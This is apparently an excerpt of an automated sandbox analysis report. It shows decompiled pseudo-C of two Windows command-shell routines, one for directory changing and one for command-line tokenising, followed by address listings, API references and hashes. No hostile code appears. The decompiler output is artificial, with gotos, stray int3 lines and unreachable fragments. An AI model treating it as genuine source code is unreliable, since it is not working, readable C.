				 *(_t177 - 0x24c) = __edx;
				_t175 = __ecx;
				_t75 = 0x5c;
				if( *((intOrPtr*)(__ecx)) == _t75) {
					if( *((intOrPtr*)(__ecx + 2)) != _t75) {
						goto L1;
					} else {
					}
				} else {
					L1:
					E00340D51(_t177 - 0x244);
					if(E00340C70(_t177 - 0x244, ((0 |  *((intOrPtr*)(_t177 - 0x38)) == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
						L52:
						E00340DE8(_t82, _t177 - 0x244);
						goto L54;
					} else {
						_t173 = E0033DF40(_t175);
						 *(_t177 - 0x250) = _t173;
						if(_t173 == 0) {
							goto L52;
						} else {
							 *((intOrPtr*)(_t177 - 4)) = 0;
							_t142 = _t173;
							_t9 =  &(_t142[1]); // 0x2
							_t164 = _t9;
							do {
								_t86 =  *_t142;
								_t142 =  &(_t142[1]);
							} while (_t86 != 0);
							_t87 =  &(_t173[_t142 - _t164 >> 1]);
							_t145 = _t87;
							while(1) {
								 *(_t177 - 0x248) = _t87;
								if(_t145 <= _t173) {
									break;
								}
								_t13 = _t87 - 2; // -4
								_t145 = _t13;
								if( *_t145 == 0x20) {
									_t87 = _t145;
									continue;
								}
								break;
							}
							 *_t87 = 0;
							_t88 =  *(_t177 - 0x3c);
							if(_t88 == 0) {
								_t88 = _t177 - 0x244;
							}
							GetCurrentDirectoryW( *(_t177 - 0x34), _t88);
							_t90 =  *(_t177 - 0x3c);
							if(_t90 == 0) {
								_t90 = _t177 - 0x244;
							}
							_t135 = towupper( *_t90 & 0x0000ffff);
							_t93 = 0x3d;
							 *((short*)(_t177 - 0x28)) = _t93;
							_t94 = iswalpha( *_t173 & 0x0000ffff);
							_t175 = 0x3a;
							if(_t94 == 0 || _t173[1] != _t175) {
								 *((short*)(_t177 - 0x26)) = _t135;
							} else {
								 *((short*)(_t177 - 0x26)) = towupper( *_t173 & 0x0000ffff);
							}
							 *(_t177 - 0x24) = _t175;
							 *((short*)(_t177 - 0x22)) = 0;
							_t96 =  *(_t177 - 0x3c);
							if(_t96 == 0) {
								_t96 = _t177 - 0x244;
							}
							_t97 = GetFullPathNameW(_t173,  *(_t177 - 0x34), _t96, _t177 - 0x248);
							if(_t97 == 0) {
								L62:
								_t175 = GetLastError();
								goto L64;
							} else {
								if(_t97 >  *(_t177 - 0x34)) {
									L65:
									E00340DE8(_t97, _t177 - 0x244);
									_push(0xfffffffe);
									_push(_t177 - 0x10);
									_push(0x35d0b4);
									L003482BB();
								} else {
									_t153 =  *(_t177 - 0x3c);
									_t105 = _t153;
									if(_t153 == 0) {
										_t105 = _t177 - 0x244;
									}
									if( *_t105 == 0) {
										L55:
										E00340DE8(_t105, _t177 - 0x244);
										_push(0xfffffffe);
										_push(_t177 - 0x10);
										_push(0x35d0b4);
										L003482BB();
										_push(3);
										goto L56;
									} else {
										if(_t153 == 0) {
											_t105 = _t177 - 0x244;
										}
										if(_t105[1] != _t175) {
											goto L55;
										} else {
											_t166 = _t153;
											if(_t153 == 0) {
												_t166 = _t177 - 0x244;
											}
											_t176 =  &(_t166[1]);
											do {
												_t109 =  *_t166;
												_t166 =  &(_t166[1]);
											} while (_t109 !=  *((intOrPtr*)(_t177 - 4)));
											_t168 = _t166 - _t176 >> 1;
											if(_t153 == 0) {
												_t153 = _t177 - 0x244;
											}
											_t169 =  &(_t153[_t168]);
											while(1) {
												_t175 = _t169;
												 *(_t177 - 0x248) = _t169;
												if(_t175 <= E00346CF0(_t177 - 0x244) + 6) {
													break;
												}
												_t131 = 0x5c;
												if( *((intOrPtr*)(_t169 - 2)) == _t131) {
													_t169 = _t175 - 2;
													continue;
												}
												break;
											}
											 *_t169 = 0;
											_t113 =  *(_t177 - 0x3c);
											if(_t113 == 0) {
												_t113 = _t177 - 0x244;
											}
											if(GetFileAttributesW(_t113) == 0xffffffff) {
												_t175 = GetLastError();
												if(_t175 == 2 || _t175 == 3) {
													goto L29;
												} else {
													if(_t175 != 0x7b) {
														goto L64;
													} else {
														goto L29;
													}
												}
											} else {
												L29:
												if( *0x373cc9 == 0) {
													L32:
													_t175 =  *(_t177 - 0x24c);
													if(_t175 == 2) {
														L36:
														if(_t175 == 0 || _t175 == 1 && _t135 ==  *((intOrPtr*)(_t177 - 0x26))) {
															_t115 =  *(_t177 - 0x3c);
															if(_t115 == 0) {
																_t115 = _t177 - 0x244;
															}
															if(SetCurrentDirectoryW(_t115) == 0) {
																goto L62;
															} else {
																goto L41;
															}
														} else {
															L41:
															_t170 =  *(_t177 - 0x3c);
															if( *(_t177 - 0x3c) == 0) {
																_t170 = _t177 - 0x244;
															}
															if(E00343A50(_t177 - 0x28, _t170) != 0) {
																E00340DE8(_t117, _t177 - 0x244);
																_push(0xfffffffe);
																_push(_t177 - 0x10);
																_push(0x35d0b4);
																L003482BB();
																L54:
																_push(8);
																L56:
															} else {
																_t158 =  *0x373cb8;
																if( *0x373cb8 == 0) {
																	_t158 = 0x373ab0;
																}
																E003436CB(_t135, _t158,  *0x373cc0, 0);
																 *((intOrPtr*)(_t177 - 4)) = 0xfffffffe;
																E00340DE8(E003436AC(_t173), _t177 - 0x244);
															}
														}
													} else {
														_t125 =  *(_t177 - 0x3c);
														if(_t125 == 0) {
															_t125 = _t177 - 0x244;
														}
														_t126 = GetFileAttributesW(_t125);
														if(_t126 == 0xffffffff) {
															_t98 = GetLastError();
															_t175 = _t98;
															if(_t98 == 2) {
																_t175 = 3;
															}
															L64:
															E00340DE8(_t98, _t177 - 0x244);
															_push(0xfffffffe);
															_push(_t177 - 0x10);
															_push(0x35d0b4);
															L003482BB();
														} else {
															if((_t126 & 0x00000410) == 0) {
																E00340DE8(_t126, _t177 - 0x244);
																_push(0xfffffffe);
																_push(_t177 - 0x10);
																_push(0x35d0b4);
																L003482BB();
															} else {
																goto L36;
															}
														}
													}
												} else {
													_t161 =  *(_t177 - 0x3c);
													if( *(_t177 - 0x3c) == 0) {
														_t161 = _t177 - 0x244;
													}
													if(E0034245C(_t161,  *(_t177 - 0x34), 0) == 0) {
														goto L65;
													} else {
														goto L32;
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return E00347614(_t135, _t173, _t175);
			}

0x003433fc
0x003433fc
0x003433fc
0x00343401
0x00343406
0x0034340b
0x00343411
0x00343415
0x00343419
0x0034dc11
0x00000000
0x0034dc17
0x0034dc17
0x0034341f
0x0034341f
0x00343425
0x0034344b
0x0034dc21
0x0034dc27
0x00000000
0x00343451
0x00343458
0x0034345a
0x00343462
0x00000000
0x00343468
0x0034346a
0x0034346d
0x0034346f
0x0034346f
0x00343472
0x00343472
0x00343475
0x00343478
0x00343481
0x00343484
0x00343486
0x00343486
0x0034348e
0x00000000
0x00000000
0x00343490
0x00343490
0x00343497
0x0034dc76
0x00000000
0x0034dc76
0x00000000
0x00343497
0x0034349f
0x003434a2
0x003434a7
0x0034dc7d
0x0034dc7d
0x003434b1
0x003434b7
0x003434bc
0x0034dc88
0x0034dc88
0x003434cd
0x003434d2
0x003434d3
0x003434db
0x003434e4
0x003434e7
0x0034dc93
0x003434f7
0x00343502
0x00343502
0x00343506
0x0034350c
0x00343510
0x00343515
0x0034dc9c
0x0034dc9c
0x00343527
0x0034352f
0x0034dca7
0x0034dcad
0x00000000
0x00343535
0x00343538
0x0034dcd9
0x0034dcdf
0x0034dce4
0x0034dce9
0x0034dcea
0x0034dcef
0x0034353e
0x0034353e
0x00343543
0x00343545
0x0034dd01
0x0034dd01
0x00343550
0x0034dc50
0x0034dc56
0x0034dc5b
0x0034dc60
0x0034dc61
0x0034dc66
0x0034dc6e
0x00000000
0x00343556
0x0034355a
0x0034dd0c
0x0034dd0c
0x00343564
0x00000000
0x0034356a
0x0034356c
0x0034356e
0x0034dd17
0x0034dd17
0x00343574
0x00343577
0x00343577
0x0034357a
0x0034357d
0x00343585
0x00343589
0x0034dd22
0x0034dd22
0x0034358f
0x00343592
0x00343592
0x00343594
0x003435aa
0x00000000
0x00000000
0x003435ae
0x003435b3
0x003436a4
0x00000000
0x003436a4
0x00000000
0x003435b3
0x003435bb
0x003435be
0x003435c3
0x0034dd2d
0x0034dd2d
0x003435d3
0x0034dd3e
0x0034dd43
0x00000000
0x0034dd52
0x0034dd55
0x00000000
0x0034dd5b
0x00000000
0x0034dd5b
0x0034dd55
0x003435d9
0x003435d9
0x003435e0
0x00343600
0x00343600
0x00343609
0x00343631
0x00343633
0x00343640
0x00343645
0x003436b4
0x003436b4
0x00343650
0x00000000
0x00000000
0x00000000
0x00000000
0x00343656
0x00343656
0x00343656
0x0034365b
0x003436bc
0x003436bc
0x00343667
0x0034dc34
0x0034dc39
0x0034dc3e
0x0034dc3f
0x0034dc44
0x0034dc4c
0x0034dc4c
0x0034dc70
0x0034366d
0x0034366d
0x00343675
0x003436c4
0x003436c4
0x00343680
0x00343685
0x00343697
0x0034369c
0x00343667
0x0034360b
0x0034360b
0x00343610
0x0034dd6b
0x0034dd6b
0x00343617
0x00343620
0x0034dd76
0x0034dd7c
0x0034dd81
0x0034dcb3
0x0034dcb3
0x0034dcb4
0x0034dcba
0x0034dcbf
0x0034dcc4
0x0034dcc5
0x0034dcca
0x00343626
0x0034362b
0x0034dd92
0x0034dd97
0x0034dd9c
0x0034dd9d
0x0034dda2
0x00000000
0x00000000
0x00000000
0x0034362b
0x00343620
0x003435e2
0x003435e2
0x003435e7
0x0034dd60
0x0034dd60
0x003435fa
0x00000000
0x00000000
0x00000000
0x00000000
0x003435fa
0x003435e0
0x003435d3
0x00343564
0x00343550
0x00343538
0x0034352f
0x00343462
0x0034344b
0x003436a3

APIs

Part of subcall function 00340D51: memset.MSVCRT ref: 00340D7D

Part of subcall function 00340C70: ??_V@YAXPAX@Z.MSVCRT ref: 00340CBA
Part of subcall function 00340C70: memset.MSVCRT ref: 00340CDD

GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,-00000105,0035BDD8,00000240,00344B82,00000000,00000000,0034AE6E,00000000,?,?,?,?,?), ref: 003434B1
towupper.MSVCRT ref: 003434C6
iswalpha.MSVCRT ref: 003434DB
towupper.MSVCRT ref: 003434FB
GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?), ref: 00343527
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 003435CA
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00343617
SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?), ref: 00343648
_local_unwind4.MSVCRT ref: 0034DC44
_local_unwind4.MSVCRT ref: 0034DC66

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: AttributesCurrentDirectoryFile_local_unwind4memsettowupper$FullNamePathiswalpha
String ID:
API String ID: 2497804757-0
Opcode ID: 05533975632b3ab6854b7fd15cd8a2ca9af8c960f051d49ab0f155323e7ec85d
Instruction ID: 0807efb5a9b218e3837542d5bfccb2aad12a5f0a025e59e8e6443825ce3a8a7d
Opcode Fuzzy Hash: 05533975632b3ab6854b7fd15cd8a2ca9af8c960f051d49ab0f155323e7ec85d
Instruction Fuzzy Hash: BCB16430A041169ADB2BEB64DD85AEDB3F8EF45300F5545A9E41ADF290EB70BF84CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0033EA40, Relevance: 23.2, APIs: 12, Strings: 1, Instructions: 413
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0033EA40(signed short* __ecx, wchar_t* __edx, signed int _a4) {
				long _v8;
				signed int _v12;
				long _v16;
				wchar_t* _v20;
				long _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				long _v236;
				char* _v260;
				char _v264;
				wchar_t* _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t73;
				signed int _t79;
				signed short _t81;
				signed int _t82;
				long _t83;
				wchar_t* _t85;
				signed char _t86;
				signed int _t87;
				int _t89;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				long _t94;
				signed int _t96;
				signed int _t104;
				signed int _t105;
				void* _t108;
				signed int _t109;
				signed int _t110;
				signed int* _t113;
				signed int _t114;
				signed int _t115;
				long _t116;
				signed int _t118;
				signed int _t121;
				signed int _t123;
				wchar_t* _t126;
				intOrPtr _t127;
				signed int _t128;
				signed int _t129;
				void* _t130;
				long _t134;
				wchar_t* _t135;
				wchar_t* _t136;
				signed int* _t137;
				intOrPtr* _t138;
				signed short* _t143;
				long _t144;
				long _t145;
				signed int _t150;
				signed int _t158;
				signed int _t159;
				long _t160;
				long _t164;
				void* _t169;
				signed int _t172;
				long _t173;
				signed int _t177;
				void* _t179;
				signed int _t180;
				signed int _t183;
				signed short* _t185;
				signed short* _t186;
				long _t187;
				signed int* _t188;
				signed int _t190;
				signed int _t191;
				void* _t193;

				_t167 = __edx;
				_t138 = __ecx;
				_t73 =  *0x35d0b4; // 0xd59bd0e8
				_v12 = _t73 ^ _t191;
				_t186 = __ecx;
				_t136 = __edx;
				if(__ecx == 0) {
					_t139 = 4;
					_t75 = E003400B0(4);
					__eflags = _t75;
					if(_t75 != 0) {
						goto L23;
					} else {
						E00359287(4);
						__imp__longjmp(0x36b8b8, 1);
						goto L95;
					}
				} else {
					_t2 = _t138 + 2; // 0x2
					_t179 = _t2;
					do {
						_t127 =  *_t138;
						_t138 = _t138 + 2;
					} while (_t127 != 0);
					_t139 = 4 + (_t138 - _t179 >> 1) * 4;
					_t128 = E003400B0(4 + (_t138 - _t179 >> 1) * 4);
					_v236 = _t128;
					if(_t128 == 0) {
						L95:
						E00359287(_t139);
						__imp__longjmp(0x36b8b8, 1);
						goto L96;
					} else {
						_v228 = _t128;
						_t185 = L"=,;";
						_t129 = 0;
						_v220 = 0;
						while(1) {
							_t164 =  *_t185 & 0x0000ffff;
							_v224 = _t164;
							if(_t164 == 0) {
								break;
							}
							if(_t136 == 0) {
								L9:
								 *(_t191 + _t129 * 2 - 0xd4) = _t164;
								_t129 = _t129 + 1;
								_v220 = _t129;
							} else {
								_t135 = wcschr(_t136, _t164);
								_t193 = _t193 + 8;
								_t129 = _v220;
								if(_t135 == 0) {
									_t164 = _v224;
									goto L9;
								}
							}
							_t185 =  &(_t185[1]);
							if(_t129 < 0x63) {
								continue;
							}
							break;
						}
						_t183 = _v228;
						_t130 = _t129 + _t129;
						if(_t130 >= 0xc8) {
							E0034711D(_t130, _t136, _t164, _t179, _t183, _t186);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t191);
							_push(_t136);
							_push(_t186);
							_v264 = 0;
							_push(_t183);
							__eflags = 0;
							_v260 =  &_v264;
							_t136 = E0033E9A0(0, 0);
							_v268 = _t136;
							goto L62;
						} else {
							_v224 = 1;
							 *((short*)(_t191 + _t130 - 0xd4)) = 0;
							_t134 =  *_t186 & 0x0000ffff;
							_v220 = 1;
							if(_t134 != 0) {
								_t144 = _t134;
								L14:
								if(_t144 == 0x22) {
									L17:
									_v224 = 0;
									if(_t136 == 0) {
										L19:
										 *_t180 =  *_t186;
										_t180 = _t180 + 2;
										if( *_t186 == 0x22) {
											while(1) {
												_t81 = _t186[1];
												_t143 = _t186;
												_t186 =  &(_t186[1]);
												 *_t180 = _t81;
												_t180 = _t180 + 2;
												_t82 =  *_t186 & 0x0000ffff;
												__eflags = _t82;
												if(_t82 == 0) {
													break;
												}
												__eflags = _t82 - 0x22;
												if(_t82 == 0x22) {
													goto L20;
												} else {
													__eflags = _t186[1];
													if(_t186[1] != 0) {
														continue;
													} else {
														goto L20;
													}
												}
												goto L22;
											}
											_t186 = _t143;
										}
										L20:
										_v220 = 0;
									} else {
										_t85 = wcschr(_t136,  *_t186 & 0x0000ffff);
										_t193 = _t193 + 8;
										if(_t85 != 0) {
											_t86 = _a4;
											__eflags = _t86 & 0x00000002;
											if((_t86 & 0x00000002) != 0) {
												__eflags = _v220;
												_t87 =  *_t186 & 0x0000ffff;
												if(_v220 == 0) {
													_t180 = _t180 + 2;
												}
												 *_t180 = _t87;
												_v220 = 1;
												_t180 = _t180 + 4;
											} else {
												__eflags = _t86 & 0x00000004;
												if((_t86 & 0x00000004) != 0) {
													 *_t180 =  *_t186;
												}
												_v220 = 0;
												_t180 = _t180 + 2;
											}
										} else {
											goto L19;
										}
									}
									_t83 = _t186[1] & 0x0000ffff;
									_t186 =  &(_t186[1]);
									_t144 = _t83;
									if(_t83 != 0) {
										goto L14;
									}
								} else {
									_t89 = iswspace(_t144);
									_t193 = _t193 + 4;
									if(_t89 != 0) {
										L24:
										_t90 = _a4;
										__eflags = _t90 & 0x00000001;
										if((_t90 & 0x00000001) != 0) {
											__eflags = _v224;
											if(_v224 == 0) {
												goto L17;
											} else {
												goto L25;
											}
										} else {
											L25:
											_t91 = _t90 & 0x00000002;
											__eflags = _t91;
											_v228 = _t91;
											if(_t91 == 0) {
												L28:
												_t93 = _a4 & 0x00000004;
												__eflags = _t93;
												_v232 = _t93;
												if(_t93 != 0) {
													L96:
													_t79 = E0033D7D4(_t136,  *_t186);
													__eflags = _t79;
													if(_t79 != 0) {
														goto L17;
													} else {
														goto L29;
													}
												} else {
													L29:
													_t94 =  *_t186 & 0x0000ffff;
													__eflags = _t94;
													if(_t94 != 0) {
														_t160 = _t94;
														while(1) {
															__eflags = _t160 - 0x22;
															if(_t160 == 0x22) {
																break;
															}
															_t114 = iswspace(_t160);
															_t193 = _t193 + 4;
															__eflags = _t114;
															if(_t114 != 0) {
																L39:
																__eflags = _v228;
																if(_v228 == 0) {
																	L42:
																	__eflags = _v232;
																	if(_v232 != 0) {
																		_t115 = E0033D7D4(_t136,  *_t186);
																		__eflags = _t115;
																		if(_t115 != 0) {
																			break;
																		} else {
																			goto L43;
																		}
																	} else {
																		L43:
																		_t116 = _t186[1] & 0x0000ffff;
																		_t186 =  &(_t186[1]);
																		_t160 = _t116;
																		__eflags = _t116;
																		if(_t116 != 0) {
																			continue;
																		} else {
																		}
																	}
																} else {
																	__eflags = _t136;
																	if(_t136 == 0) {
																		goto L42;
																	} else {
																		_t118 = wcschr(_t136,  *_t186 & 0x0000ffff);
																		_t193 = _t193 + 8;
																		__eflags = _t118;
																		if(_t118 != 0) {
																			break;
																		} else {
																			goto L42;
																		}
																	}
																}
															} else {
																_t121 = wcschr( &_v216,  *_t186 & 0x0000ffff);
																_t193 = _t193 + 8;
																__eflags = _t121;
																if(_t121 != 0) {
																	goto L39;
																} else {
																	break;
																}
															}
															goto L22;
														}
														__eflags =  *_t186;
														if( *_t186 != 0) {
															__eflags = _v224;
															if(_v224 == 0) {
																__eflags = _v220;
																if(_v220 == 0) {
																	_t180 = _t180 + 2;
																	__eflags = _t180;
																}
															}
															_v220 = 1;
															goto L17;
														}
													}
												}
											} else {
												__eflags = _t136;
												if(_t136 == 0) {
													goto L28;
												} else {
													_t123 = wcschr(_t136,  *_t186 & 0x0000ffff);
													_t193 = _t193 + 8;
													__eflags = _t123;
													if(_t123 != 0) {
														goto L17;
													} else {
														goto L28;
													}
												}
											}
										}
									} else {
										_t126 = wcschr( &_v216,  *_t186 & 0x0000ffff);
										_t193 = _t193 + 8;
										if(_t126 != 0) {
											goto L24;
										} else {
											goto L17;
										}
									}
								}
							}
							L22:
							_t145 = _v236;
							_t180 = _t180 - _t145 >> 1;
							_t167 = 4 + _t180 * 2;
							if(E00340100(_t145, 4 + _t180 * 2) == 0) {
								E00359287(_t145);
								__imp__longjmp(0x36b8b8, 1);
								asm("int3");
								L102:
								_t169 = _t145 + 2;
								do {
									_t96 =  *_t145;
									_t145 = _t145 + 2;
									__eflags = _t96;
								} while (_t96 != 0);
								_t183 = _t180 + (_t145 - _t169 >> 1);
								L68:
								_t148 = _t183 + _t183;
								_t187 = E003400B0(_t183 + _t183);
								_v8 = _t187;
								__eflags = _t187;
								if(_t187 == 0) {
									E00359287(_t148);
									__imp__longjmp(0x36b8b8, 1);
									asm("int3");
									__eflags =  *0x36fa90;
									if( *0x36fa90 != 0) {
										E003582EB(_t148);
									}
									__eflags = 0;
									__eflags =  *0x36fa88;
									 *0x35d5c8 = 0;
									if( *0x36fa88 != 0) {
										E00358121(_t187, 0);
									}
									return _t187;
								}
								_t150 = _t136[0xf];
								__eflags = _t150;
								if(_t150 != 0) {
									E00341040(_t187, _t183, _t150);
								}
								_t104 = 0;
								__eflags = _t183;
								if(_t183 == 0) {
									L106:
									_t104 = 0x80070057;
								} else {
									__eflags = _t183 - 0x7fffffff;
									if(_t183 > 0x7fffffff) {
										goto L106;
									}
								}
								__eflags = _t104;
								if(_t104 < 0) {
									L109:
									_t172 = 0;
								} else {
									_t104 = 0;
									_t159 = _t183;
									_t173 = _t187;
									__eflags = _t183;
									if(_t183 == 0) {
										L108:
										_t104 = 0x80070057;
										goto L109;
									} else {
										while(1) {
											__eflags =  *_t173 - _t104;
											if( *_t173 == _t104) {
												break;
											}
											_t173 = _t173 + 2;
											_t159 = _t159 - 1;
											__eflags = _t159;
											if(_t159 != 0) {
												continue;
											} else {
												goto L108;
											}
											goto L114;
										}
										__eflags = _t159;
										if(_t159 == 0) {
											goto L108;
										} else {
											_t172 = _t183 - _t159;
											__eflags = _t172;
										}
									}
								}
								__eflags = _t104;
								if(_t104 >= 0) {
									_t113 = _v8 + _t172 * 2;
									_t190 = _t183 - _t172;
									__eflags = _t190;
									if(_t190 == 0) {
										L83:
										_t113 = _t113 - 2;
									} else {
										_t177 = _t172 + 0x7ffffffe + _t190 - _t183;
										_t183 = 0x36faa0 - _t113;
										__eflags = 0x36faa0;
										while(1) {
											__eflags = _t177;
											if(_t177 == 0) {
												break;
											}
											_t158 =  *(_t113 + _t183) & 0x0000ffff;
											__eflags = _t158;
											if(_t158 == 0) {
												break;
											} else {
												 *_t113 = _t158;
												_t177 = _t177 - 1;
												_t113 =  &(_t113[0]);
												_t190 = _t190 - 1;
												__eflags = _t190;
												if(_t190 != 0) {
													continue;
												} else {
													goto L83;
												}
											}
											goto L85;
										}
										__eflags = _t190;
										if(_t190 == 0) {
											goto L83;
										}
									}
									L85:
									_t187 = _v8;
									__eflags = 0;
									 *_t113 = 0;
								}
								_t136[0xf] = _t187;
								while(1) {
									L62:
									_t105 = E0033EEC8();
									__eflags = _t105;
									if(_t105 == 0) {
										break;
									}
									_t108 = E0033F030(1);
									__eflags = _t108 - 0x4000;
									if(_t108 == 0x4000) {
										_t145 = _t136[0xf];
										_t180 =  *0x36fa8c;
										__eflags = _t145;
										if(_t145 != 0) {
											goto L102;
										}
										goto L68;
									} else {
										_t188 = _v12;
										_t109 = E003402B0(_t136, _t188, _t183, _t188);
										__eflags = _t109;
										if(_t109 != 0) {
											_t110 =  *_t188;
											do {
												_t69 = _t110 + 0x14; // 0x14
												_t137 = _t69;
												_t110 =  *_t137;
												_v12 = _t137;
												__eflags = _t110;
											} while (_t110 != 0);
											_t136 = _v20;
											continue;
										} else {
											__eflags = 0;
											E0033F300(_t109, 0, 0, _t109);
										}
									}
									break;
								}
								_t136[0xd] = _v16;
								return _t136;
							} else {
								L23:
								return E00346FD0(_t75, _t136, _v12 ^ _t191, _t167, _t180, _t186);
							}
						}
					}
				}
				goto L114;
			}

0x0033ea40
0x0033ea40
0x0033ea4b
0x0033ea52
0x0033ea57
0x0033ea59
0x0033ea5e
0x0033ed52
0x0033ed57
0x0033ed5c
0x0033ed5e
0x00000000
0x0033ed64
0x0034c03d
0x0034c049
0x00000000
0x0034c049
0x0033ea64
0x0033ea64
0x0033ea64
0x0033ea67
0x0033ea67
0x0033ea6a
0x0033ea6d
0x0033ea76
0x0033ea7d
0x0033ea82
0x0033ea8a
0x0034c04f
0x0034c04f
0x0034c05b
0x00000000
0x0033ea90
0x0033ea90
0x0033ea96
0x0033ea9b
0x0033ea9d
0x0033eaa3
0x0033eaa3
0x0033eaa6
0x0033eaaf
0x00000000
0x00000000
0x0033eab3
0x0033ead0
0x0033ead0
0x0033ead8
0x0033ead9
0x0033eab5
0x0033eab7
0x0033eabd
0x0033eac2
0x0033eac8
0x0033eaca
0x00000000
0x0033eaca
0x0033eac8
0x0033eadf
0x0033eae5
0x00000000
0x00000000
0x00000000
0x0033eae5
0x0033eae7
0x0033eaed
0x0033eaf4
0x0033ed75
0x0033ed7a
0x0033ed7b
0x0033ed7c
0x0033ed7d
0x0033ed7e
0x0033ed7f
0x0033ed82
0x0033ed88
0x0033ed89
0x0033ed8d
0x0033ed94
0x0033ed95
0x0033ed97
0x0033ed9f
0x0033eda1
0x00000000
0x0033eafa
0x0033eafc
0x0033eb06
0x0033eb0e
0x0033eb11
0x0033eb1e
0x0033eb24
0x0033eb26
0x0033eb2a
0x0033eb5a
0x0033eb5a
0x0033eb66
0x0033eb7e
0x0033eb81
0x0033eb84
0x0033eb8b
0x0033ecf0
0x0033ecf0
0x0033ecf4
0x0033ecf6
0x0033ecf9
0x0033ecfc
0x0033ecff
0x0033ed02
0x0033ed05
0x00000000
0x00000000
0x0033ed07
0x0033ed0a
0x00000000
0x0033ed10
0x0033ed10
0x0033ed15
0x00000000
0x0033ed17
0x00000000
0x0033ed17
0x0033ed15
0x00000000
0x0033ed0a
0x0033ed6e
0x0033ed6e
0x0033eb91
0x0033eb91
0x0033eb68
0x0033eb6d
0x0033eb73
0x0033eb78
0x0033eccd
0x0033ecd0
0x0033ecd2
0x0033ed1c
0x0033ed23
0x0033ed26
0x0033ed69
0x0033ed69
0x0033ed28
0x0033ed2e
0x0033ed38
0x0033ecd4
0x0033ecd4
0x0033ecd6
0x0034c092
0x0034c092
0x0033ecdc
0x0033ece6
0x0033ece6
0x00000000
0x00000000
0x00000000
0x0033eb78
0x0033eb9b
0x0033eb9f
0x0033eba2
0x0033eba7
0x00000000
0x00000000
0x0033eb2c
0x0033eb2d
0x0033eb33
0x0033eb38
0x0033ebde
0x0033ebde
0x0033ebe1
0x0033ebe3
0x0033ed40
0x0033ed47
0x00000000
0x0033ed4d
0x00000000
0x0033ed4d
0x0033ebe9
0x0033ebe9
0x0033ebe9
0x0033ebe9
0x0033ebec
0x0033ebf2
0x0033ec0e
0x0033ec11
0x0033ec11
0x0033ec14
0x0033ec1a
0x0034c061
0x0034c066
0x0034c06b
0x0034c06d
0x00000000
0x0034c073
0x00000000
0x0034c073
0x0033ec20
0x0033ec20
0x0033ec20
0x0033ec23
0x0033ec26
0x0033ec28
0x0033ec30
0x0033ec30
0x0033ec34
0x00000000
0x00000000
0x0033ec37
0x0033ec3d
0x0033ec40
0x0033ec42
0x0033ec8a
0x0033ec8a
0x0033ec91
0x0033eca9
0x0033eca9
0x0033ecb0
0x0034c07d
0x0034c082
0x0034c084
0x00000000
0x0034c08a
0x00000000
0x0034c08a
0x0033ecb6
0x0033ecb6
0x0033ecb6
0x0033ecba
0x0033ecbd
0x0033ecbf
0x0033ecc2
0x00000000
0x00000000
0x0033ecc8
0x0033ecc2
0x0033ec93
0x0033ec93
0x0033ec95
0x00000000
0x0033ec97
0x0033ec9c
0x0033eca2
0x0033eca5
0x0033eca7
0x00000000
0x00000000
0x00000000
0x00000000
0x0033eca7
0x0033ec95
0x0033ec44
0x0033ec4f
0x0033ec55
0x0033ec58
0x0033ec5a
0x00000000
0x00000000
0x00000000
0x00000000
0x0033ec5a
0x00000000
0x0033ec42
0x0033ec5c
0x0033ec60
0x0033ec66
0x0033ec6d
0x0033ec6f
0x0033ec76
0x0033ec78
0x0033ec78
0x0033ec78
0x0033ec76
0x0033ec7b
0x00000000
0x0033ec7b
0x0033ec60
0x0033ec26
0x0033ebf4
0x0033ebf4
0x0033ebf6
0x00000000
0x0033ebf8
0x0033ebfd
0x0033ec03
0x0033ec06
0x0033ec08
0x00000000
0x00000000
0x00000000
0x00000000
0x0033ec08
0x0033ebf6
0x0033ebf2
0x0033eb3e
0x0033eb49
0x0033eb4f
0x0033eb54
0x00000000
0x00000000
0x00000000
0x00000000
0x0033eb54
0x0033eb38
0x0033eb2a
0x0033ebad
0x0033ebad
0x0033ebb5
0x0033ebb7
0x0033ebc5
0x0034c09a
0x0034c0a6
0x0034c0ac
0x0034c0ad
0x0034c0ad
0x0034c0b0
0x0034c0b0
0x0034c0b3
0x0034c0b6
0x0034c0b6
0x0034c0bf
0x0033edfa
0x0033edfa
0x0033ee02
0x0033ee04
0x0033ee07
0x0033ee09
0x0034c0f7
0x0034c103
0x0034c109
0x0034c10a
0x0034c111
0x0034c117
0x0034c117
0x0033efe1
0x0033efe3
0x0033efea
0x0033efef
0x0034c125
0x0034c125
0x00000000
0x0033eff5
0x0033ee0f
0x0033ee12
0x0033ee14
0x0034c0cb
0x0034c0cb
0x0033ee1a
0x0033ee1c
0x0033ee1e
0x0034c0d5
0x0034c0d5
0x0033ee24
0x0033ee24
0x0033ee2a
0x00000000
0x00000000
0x0033ee2a
0x0033ee30
0x0033ee32
0x0034c0f0
0x0034c0f0
0x0033ee38
0x0033ee38
0x0033ee3a
0x0033ee3c
0x0033ee3e
0x0033ee40
0x0034c0eb
0x0034c0eb
0x00000000
0x0033ee46
0x0033ee46
0x0033ee46
0x0033ee49
0x00000000
0x00000000
0x0034c0df
0x0034c0e2
0x0034c0e2
0x0034c0e5
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0034c0e5
0x0033ee4f
0x0033ee51
0x00000000
0x0033ee57
0x0033ee59
0x0033ee59
0x0033ee59
0x0033ee51
0x0033ee40
0x0033ee5b
0x0033ee5d
0x0033ee64
0x0033ee67
0x0033ee67
0x0033ee69
